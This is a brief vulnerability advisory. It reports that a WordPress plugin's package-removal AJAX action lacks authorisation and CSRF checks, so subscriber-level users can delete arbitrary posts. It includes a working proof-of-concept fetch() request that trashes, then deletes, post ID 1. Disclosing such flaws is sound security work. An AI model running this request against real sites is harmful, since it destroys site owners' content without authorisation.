Description The plugin does not have authorisation and CSRF checks, as well as does not ensure that the package to be deleted is a package, allowing any authenticated users, such as subscriber to delete arbitrary posts
Run the below command in the developer console of the web browser while being on the blog as a subscriber user. This will put the post with ID 1 in the trash. Run it again to then delete the post
fetch("/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},"body": 'action=tp_extra_package_remove&package_id=1',"method": "POST"});